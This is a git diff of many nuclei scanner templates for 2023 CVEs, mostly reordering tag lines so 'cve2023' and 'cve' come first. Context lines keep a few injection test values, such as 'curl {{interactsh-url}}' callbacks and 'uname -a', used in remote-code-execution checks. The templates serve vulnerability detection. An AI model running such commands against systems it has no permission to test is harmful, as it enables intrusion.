framework: wordpress
- tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum
+ tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml
index 4611c77829..98c8a0d83c 100644
--- a/http/cves/2023/CVE-2023-0261.yaml
+++ b/http/cves/2023/CVE-2023-0261.yaml
@@ -27,7 +27,7 @@ info:
vendor: ljapps
product: wp_tripadvisor_review_slider
framework: wordpress
- tags: cve2023,wordpress,wp,wp-tripadvisor-review-slider,auth,cve,sqli,wp-plugin,wpscan,ljapps
+ tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index b26347c6a0..61f7268cf2 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -31,7 +31,7 @@ info:
product: pyload
shodan-query: html:"pyload"
zoomeye-query: app:"pyLoad"
- tags: huntr,packetstorm,cve,cve2023,rce,pyload,oast
+ tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast
variables:
cmd: "curl {{interactsh-url}}"
diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml
index a7e7b5c939..4981ab5b4b 100644
--- a/http/cves/2023/CVE-2023-0334.yaml
+++ b/http/cves/2023/CVE-2023-0334.yaml
@@ -25,7 +25,7 @@ info:
product: shortpixel_adaptive_images
framework: wordpress
publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/
- tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel
+ tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml
index 899ce98679..995c1f11b2 100644
--- a/http/cves/2023/CVE-2023-0514.yaml
+++ b/http/cves/2023/CVE-2023-0514.yaml
@@ -28,7 +28,7 @@ info:
vendor: membership_database_project
product: membership_database
framework: wordpress
- tags: wpscan,cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project
+ tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml
index 33ee85f27d..acf3c1a5b7 100644
--- a/http/cves/2023/CVE-2023-0527.yaml
+++ b/http/cves/2023/CVE-2023-0527.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: online_security_guards_hiring_system_project
product: online_security_guards_hiring_system
- tags: packetstorm,cve,cve2023,osghs,xss,online_security_guards_hiring_system_project
+ tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml
index b008b84c4e..0f9fe54d93 100644
--- a/http/cves/2023/CVE-2023-0552.yaml
+++ b/http/cves/2023/CVE-2023-0552.yaml
@@ -25,7 +25,7 @@ info:
vendor: genetechsolutions
product: pie_register
framework: wordpress
- tags: cve2023,redirect,pie,pie-register,wpscan,cve,genetechsolutions,wordpress
+ tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml
index 7abf19d7ee..0129dae91e 100644
--- a/http/cves/2023/CVE-2023-0563.yaml
+++ b/http/cves/2023/CVE-2023-0563.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: phpgurukul
product: bank_locker_management_system
- tags: cve,cve2023,blms,xss,phpgurukul
+ tags: cve2023,cve,blms,xss,phpgurukul
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml
index e1084342e1..b9448d0137 100644
--- a/http/cves/2023/CVE-2023-0600.yaml
+++ b/http/cves/2023/CVE-2023-0600.yaml
@@ -26,7 +26,7 @@ info:
framework: wordpress
fofa-query: body="wp-stats-manager"
public-www: "/wp-content/plugins/wp-stats-manager/"
- tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market
+ tags: cve2023,cve,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market
variables:
str: '{{rand_int(100000, 999999)}}'
diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml
index 6db9d03933..836509eb4c 100644
--- a/http/cves/2023/CVE-2023-0602.yaml
+++ b/http/cves/2023/CVE-2023-0602.yaml
@@ -24,7 +24,7 @@ info:
vendor: johnniejodelljr
product: twittee_text_tweet
framework: wordpress
- tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr
+ tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml
index c2df32c495..1a66f58d12 100644
--- a/http/cves/2023/CVE-2023-0630.yaml
+++ b/http/cves/2023/CVE-2023-0630.yaml
@@ -27,7 +27,7 @@ info:
vendor: wp-slimstat
product: slimstat_analytics
framework: wordpress
- tags: wpscan,cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated
+ tags: cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml
index 5a50e34cb1..a28b675a4b 100644
--- a/http/cves/2023/CVE-2023-0669.yaml
+++ b/http/cves/2023/CVE-2023-0669.yaml
@@ -30,7 +30,7 @@ info:
vendor: fortra
product: goanywhere_managed_file_transfer
shodan-query: http.favicon.hash:1484947000
- tags: cve,cve2023,rce,goanywhere,oast,kev,fortra
+ tags: cve2023,cve,rce,goanywhere,oast,kev,fortra
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml
index fe2f7c089c..3c0351e7e4 100644
--- a/http/cves/2023/CVE-2023-0777.yaml
+++ b/http/cves/2023/CVE-2023-0777.yaml
@@ -26,7 +26,7 @@ info:
product: modoboa
shodan-query: html:"Modoboa"
fofa-query: body="Modoboa"
- tags: huntr,packetstorm,modoboa,default-login
+ tags: cve2023,cve,huntr,packetstorm,modoboa,default-login
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml
index 8d7186acfb..b235ff79f8 100644
--- a/http/cves/2023/CVE-2023-0900.yaml
+++ b/http/cves/2023/CVE-2023-0900.yaml
@@ -25,7 +25,7 @@ info:
product: pricing_table_builder
framework: wordpress
publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
- tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart
+ tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml
index d9bee30df3..796441ccf4 100644
--- a/http/cves/2023/CVE-2023-0942.yaml
+++ b/http/cves/2023/CVE-2023-0942.yaml
@@ -29,7 +29,7 @@ info:
vendor: artisanworkshop
product: japanized_for_woocommerce
framework: wordpress
- tags: cve2023,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,cve,xss,woocommerce,plugin,artisanworkshop
+ tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml
index ecfd98d9fa..764b877ee1 100644
--- a/http/cves/2023/CVE-2023-0947.yaml
+++ b/http/cves/2023/CVE-2023-0947.yaml
@@ -24,7 +24,7 @@ info:
vendor: flatpress
product: flatpress
shodan-query: http.favicon.hash:-1189292869
- tags: huntr,cve,cve2023,lfi,flatpress,listing
+ tags: cve,cve2023,huntr,lfi,flatpress,listing
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml
index 329fa4bd69..1020b9095c 100644
--- a/http/cves/2023/CVE-2023-0948.yaml
+++ b/http/cves/2023/CVE-2023-0948.yaml
@@ -27,7 +27,7 @@ info:
vendor: artisanworkshop
product: japanized_for_woocommerce
framework: wordpress
- tags: wpscan,cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop
+ tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml
index a00fb37d39..845ad78838 100644
--- a/http/cves/2023/CVE-2023-0968.yaml
+++ b/http/cves/2023/CVE-2023-0968.yaml
@@ -29,7 +29,7 @@ info:
vendor: kibokolabs
product: watu_quiz
framework: wordpress
- tags: wordpress,cve,cve2023,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs
+ tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml
index bdc16af457..aff13b36d0 100644
--- a/http/cves/2023/CVE-2023-1020.yaml
+++ b/http/cves/2023/CVE-2023-1020.yaml
@@ -26,7 +26,7 @@ info:
vendor: wp_live_chat_shoutbox_project
product: wp_live_chat_shoutbox
framework: wordpress
- tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project
+ tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml
index 97e1c1b391..515c64d79c 100644
--- a/http/cves/2023/CVE-2023-1080.yaml
+++ b/http/cves/2023/CVE-2023-1080.yaml
@@ -29,7 +29,7 @@ info:
vendor: gnpublisher
product: gn_publisher
framework: wordpress
- tags: wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve,gnpublisher
+ tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml
index d51c003f30..5184c0d775 100644
--- a/http/cves/2023/CVE-2023-1177.yaml
+++ b/http/cves/2023/CVE-2023-1177.yaml
@@ -30,7 +30,7 @@ info:
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
- tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects
+ tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml
index 763d48294a..50957a1764 100644
--- a/http/cves/2023/CVE-2023-1408.yaml
+++ b/http/cves/2023/CVE-2023-1408.yaml
@@ -25,7 +25,7 @@ info:
product: video_list_manager
framework: wordpress
publicwww-query: /wp-content/plugins/video-list-manager/
- tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project
+ tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml
index 0999450bfd..ec8cffb459 100644
--- a/http/cves/2023/CVE-2023-1434.yaml
+++ b/http/cves/2023/CVE-2023-1434.yaml
@@ -20,7 +20,7 @@ info:
verified: true
max-request: 1
shodan-query: title:"Odoo"
- tags: cve,cve2023,odoo,xss
+ tags: cve2023,cve,odoo,xss
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml
index b70fba36db..be5d20a6f4 100644
--- a/http/cves/2023/CVE-2023-1454.yaml
+++ b/http/cves/2023/CVE-2023-1454.yaml
@@ -29,7 +29,7 @@ info:
vendor: jeecg
product: jeecg-boot
shodan-query: http.favicon.hash:1380908726
- tags: cve,cve2023,jeecg,sqli
+ tags: cve2023,cve,jeecg,sqli
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml
index 9d7fe8783e..f31dbd0940 100644
--- a/http/cves/2023/CVE-2023-1496.yaml
+++ b/http/cves/2023/CVE-2023-1496.yaml
@@ -26,7 +26,7 @@ info:
vendor: evilmartians
product: imgproxy
shodan-query: "Server: imgproxy"
- tags: huntr,cve,cve2023,imgproxy,xss,svg,evilmartians
+ tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml
index ea72fffae6..503b37ad92 100644
--- a/http/cves/2023/CVE-2023-1671.yaml
+++ b/http/cves/2023/CVE-2023-1671.yaml
@@ -30,7 +30,7 @@ info:
product: web_appliance
shodan-query: title:"Sophos Web Appliance"
fofa-query: title="Sophos Web Appliance"
- tags: packetstorm,cve,cve2023,rce,sophos,oast,kev
+ tags: cve2023,cve,packetstorm,rce,sophos,oast,kev
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml
index f92521c25e..0a5285ec44 100644
--- a/http/cves/2023/CVE-2023-1698.yaml
+++ b/http/cves/2023/CVE-2023-1698.yaml
@@ -27,7 +27,7 @@ info:
vendor: wago
product: compact_controller_100_firmware
shodan-query: html:"/wbm/" html:"wago"
- tags: cve,cve2023,wago,rce
+ tags: cve2023,cve,wago,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml
index 0b61cdcd84..ea3e27009c 100644
--- a/http/cves/2023/CVE-2023-1719.yaml
+++ b/http/cves/2023/CVE-2023-1719.yaml
@@ -23,7 +23,7 @@ info:
vendor: bitrix24
product: bitrix24
shodan-query: html:"/bitrix/"
- tags: cve,cve2023,bitrix,xss,bitrix24
+ tags: cve2023,cve,bitrix,xss,bitrix24
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml
index fe350275d7..a7dc3fdea6 100644
--- a/http/cves/2023/CVE-2023-1730.yaml
+++ b/http/cves/2023/CVE-2023-1730.yaml
@@ -27,7 +27,7 @@ info:
vendor: supportcandy
product: supportcandy
framework: wordpress
- tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth
+ tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml
index 029a238f98..4d6fff1d54 100644
--- a/http/cves/2023/CVE-2023-1835.yaml
+++ b/http/cves/2023/CVE-2023-1835.yaml
@@ -28,7 +28,7 @@ info:
vendor: ninjaforms
product: ninja_forms
framework: wordpress
- tags: wpscan,cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms
+ tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml
index 3ef0346035..64abeeb44b 100644
--- a/http/cves/2023/CVE-2023-1880.yaml
+++ b/http/cves/2023/CVE-2023-1880.yaml
@@ -25,7 +25,7 @@ info:
vendor: phpmyfaq
product: phpmyfaq
shodan-query: http.html:"phpmyfaq"
- tags: huntr,cve,cve2023,xss,phpmyfaq
+ tags: cve2023,cve,huntr,xss,phpmyfaq
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml
index c6f9594875..c4c85af0fa 100644
--- a/http/cves/2023/CVE-2023-1890.yaml
+++ b/http/cves/2023/CVE-2023-1890.yaml
@@ -27,7 +27,7 @@ info:
vendor: pauple
product: tablesome
framework: wordpress
- tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple
+ tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml
index 0b02d701e5..188d8d9281 100644
--- a/http/cves/2023/CVE-2023-20073.yaml
+++ b/http/cves/2023/CVE-2023-20073.yaml
@@ -30,7 +30,7 @@ info:
vendor: cisco
product: rv340_firmware
fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
- tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive
+ tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive
variables:
html_comment: "" # Random string as HTML comment to append in response body
diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml
index 1459704d9e..adee86d6f0 100644
--- a/http/cves/2023/CVE-2023-2009.yaml
+++ b/http/cves/2023/CVE-2023-2009.yaml
@@ -24,7 +24,7 @@ info:
vendor: pretty_url_project
product: pretty_url
framework: wordpress
- tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project
+ tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml
index d787e6a74d..f309a04173 100644
--- a/http/cves/2023/CVE-2023-20198.yaml
+++ b/http/cves/2023/CVE-2023-20198.yaml
@@ -32,7 +32,7 @@ info:
product: ios_xe
shodan-query: http.html_hash:1076109428
note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
- tags: cve,cve2023,kev,cisco,rce,auth-bypass
+ tags: cve2023,cve,kev,cisco,rce,auth-bypass
variables:
cmd: uname -a
diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml
index 33efa3e5e0..23e0f98103 100644
--- a/http/cves/2023/CVE-2023-2023.yaml
+++ b/http/cves/2023/CVE-2023-2023.yaml
@@ -27,7 +27,7 @@ info:
vendor: kunalnagar
product: custom_404_pro
framework: wordpress
- tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar
+ tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml
index 6d468e6800..6a19203a23 100644
--- a/http/cves/2023/CVE-2023-20864.yaml
+++ b/http/cves/2023/CVE-2023-20864.yaml
@@ -27,7 +27,7 @@ info:
vendor: vmware
product: aria_operations_for_logs
shodan-query: title:"vRealize Log Insight"
- tags: cve,cve2023,vmware,aria,rce,oast
+ tags: cve2023,cve,vmware,aria,rce,oast
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml
index fd30a040c2..58a53fd302 100644
--- a/http/cves/2023/CVE-2023-20887.yaml
+++ b/http/cves/2023/CVE-2023-20887.yaml
@@ -31,7 +31,7 @@ info:
product: vrealize_network_insight
shodan-query: title:"VMware vRealize Network Insight"
fofa-query: title="VMware vRealize Network Insight"
- tags: packetstorm,cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev
+ tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev
variables:
cmd: "curl {{interactsh-url}}"
diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml
index da207fb406..599aed612c 100644
--- a/http/cves/2023/CVE-2023-20888.yaml
+++ b/http/cves/2023/CVE-2023-20888.yaml
@@ -27,7 +27,7 @@ info:
vendor: vmware
product: vrealize_network_insight
shodan-query: title:"VMware Aria Operations"
- tags: cve,cve2023,vmware,aria,rce,authenticated,oast
+ tags: cve2023,cve,vmware,aria,rce,authenticated,oast
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml
index e8ab151af0..426dbc8428 100644
--- a/http/cves/2023/CVE-2023-20889.yaml
+++ b/http/cves/2023/CVE-2023-20889.yaml
@@ -28,7 +28,7 @@ info:
vendor: vmware
product: vrealize_network_insight
shodan-query: title:"VMware Aria Operations"
- tags: cve,cve2023,vmware,aria,disclosure,authenticated,rce,oast,intrusive
+ tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive
variables:
payload: location='http://{{interactsh-url}}'
diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml
index ac9888b620..b72902901e 100644
--- a/http/cves/2023/CVE-2023-2122.yaml
+++ b/http/cves/2023/CVE-2023-2122.yaml
@@ -25,7 +25,7 @@ info:
vendor: 10web
product: image_optimizer
framework: wordpress
- tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web
+ tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml
index 9a9a2393a0..0d480dc76d 100644
--- a/http/cves/2023/CVE-2023-2130.yaml
+++ b/http/cves/2023/CVE-2023-2130.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
- tags: cve,cve2023,sqli,purchase-order-management-system,purchase_order_management_system_project
+ tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml
index 2196464883..2bedb97a39 100644
--- a/http/cves/2023/CVE-2023-2178.yaml
+++ b/http/cves/2023/CVE-2023-2178.yaml
@@ -28,7 +28,7 @@ info:
vendor: aajoda
product: aajoda_testimonials
framework: wordpress
- tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated,aajoda
+ tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml
index bbb6d5ea8b..639d63912a 100644
--- a/http/cves/2023/CVE-2023-22232.yaml
+++ b/http/cves/2023/CVE-2023-22232.yaml
@@ -18,7 +18,7 @@ info:
max-request: 1
verified: true
shodan-query: title:"Adobe Connect"
- tags: cve,cve2023,adobe,lfd,download
+ tags: cve2023,cve,adobe,lfd,download
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml
index f7fca2e30c..ddcfec09de 100644
--- a/http/cves/2023/CVE-2023-2224.yaml
+++ b/http/cves/2023/CVE-2023-2224.yaml
@@ -24,7 +24,7 @@ info:
vendor: 10web
product: seo
framework: wordpress
- tags: wpscan,packetstorm,cve,cve2023,wp,wordpress,wp-plugin,xss,seo,10web,authenticated
+ tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml
index dae21cda72..659fee57e0 100644
--- a/http/cves/2023/CVE-2023-22478.yaml
+++ b/http/cves/2023/CVE-2023-22478.yaml
@@ -31,7 +31,7 @@ info:
product: kubepi
shodan-query: html:"kubepi"
fofa-query: "kubepi"
- tags: cve,cve2023,kubepi,k8s,exposure,fit2cloud
+ tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml
index b3cb588467..4a40915378 100644
--- a/http/cves/2023/CVE-2023-22480.yaml
+++ b/http/cves/2023/CVE-2023-22480.yaml
@@ -31,7 +31,7 @@ info:
product: kubeoperator
shodan-query: html:"KubeOperator"
fofa-query: app="KubeOperator"
- tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure,fit2cloud
+ tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml
index 050a315ff4..aa169be9a2 100644
--- a/http/cves/2023/CVE-2023-22515.yaml
+++ b/http/cves/2023/CVE-2023-22515.yaml
@@ -27,7 +27,7 @@ info:
vendor: atlassian
product: confluence_data_center
fofa-query: app="ATLASSIAN-Confluence"
- tags: cve,cve2023,confluence,auth-bypass,kev,intrusive,atlassian
+ tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian
variables:
username: "{{rand_base(10)}}"
password: "{{rand_base(10)}}"
diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml
index 8661dbb139..337af946b5 100644
--- a/http/cves/2023/CVE-2023-2252.yaml
+++ b/http/cves/2023/CVE-2023-2252.yaml
@@ -16,7 +16,7 @@ info:
metadata:
verified: true
max-request: 2
- tags: wpscan,cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated
+ tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml
index f38e22ed0a..047affd3b6 100644
--- a/http/cves/2023/CVE-2023-22620.yaml
+++ b/http/cves/2023/CVE-2023-22620.yaml
@@ -29,7 +29,7 @@ info:
vendor: securepoint
product: unified_threat_management
shodan-query: title:"Securepoint UTM"
- tags: utm,leak,memory,packetstorm,cve,cve2023,securepoint
+ tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml
index f9ce667785..5b07ac8abb 100644
--- a/http/cves/2023/CVE-2023-2272.yaml
+++ b/http/cves/2023/CVE-2023-2272.yaml
@@ -28,7 +28,7 @@ info:
vendor: tiempo
product: tiempo
framework: wordpress
- tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom,tiempo
+ tags: cve,cve2023,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tiempocom,tiempo
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml
index 88b3471559..92417adb43 100644
--- a/http/cves/2023/CVE-2023-23161.yaml
+++ b/http/cves/2023/CVE-2023-23161.yaml
@@ -30,7 +30,7 @@ info:
vendor: art_gallery_management_system_project
product: art_gallery_management_system
fofa-query: title="Art Gallery Management System"
- tags: packetstorm,cve,cve2023,art,gallery,xss,art_gallery_management_system_project
+ tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml
index 0232bbf663..13b637458f 100644
--- a/http/cves/2023/CVE-2023-23333.yaml
+++ b/http/cves/2023/CVE-2023-23333.yaml
@@ -30,7 +30,7 @@ info:
product: solarview_compact_firmware
shodan-query: http.html:"SolarView Compact"
fofa-query: body="SolarView Compact" && title="Top"
- tags: packetstorm,cve,cve2023,solarview,rce,contec
+ tags: cve,cve2023,packetstorm,solarview,rce,contec
variables:
cmd: "echo+CVE-2023-23333|rev"
diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml
index adec14054e..6704b27468 100644
--- a/http/cves/2023/CVE-2023-23488.yaml
+++ b/http/cves/2023/CVE-2023-23488.yaml
@@ -29,7 +29,7 @@ info:
vendor: strangerstudios
product: paid_memberships_pro
framework: wordpress
- tags: paid-memberships-pro,cve2023,wordpress,tenable,packetstorm,wp-plugin,sqli,cve,wp,strangerstudios
+ tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml
index eae5a8facf..4861baa4a9 100644
--- a/http/cves/2023/CVE-2023-23489.yaml
+++ b/http/cves/2023/CVE-2023-23489.yaml
@@ -29,7 +29,7 @@ info:
vendor: sandhillsdev
product: easy_digital_downloads
framework: wordpress
- tags: easy-digital-downloads,unauth,cve,wpscan,wordpress,wp,wp-plugin,cve2023,sqli,tenable,sandhillsdev
+ tags: cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev
http:
- raw:
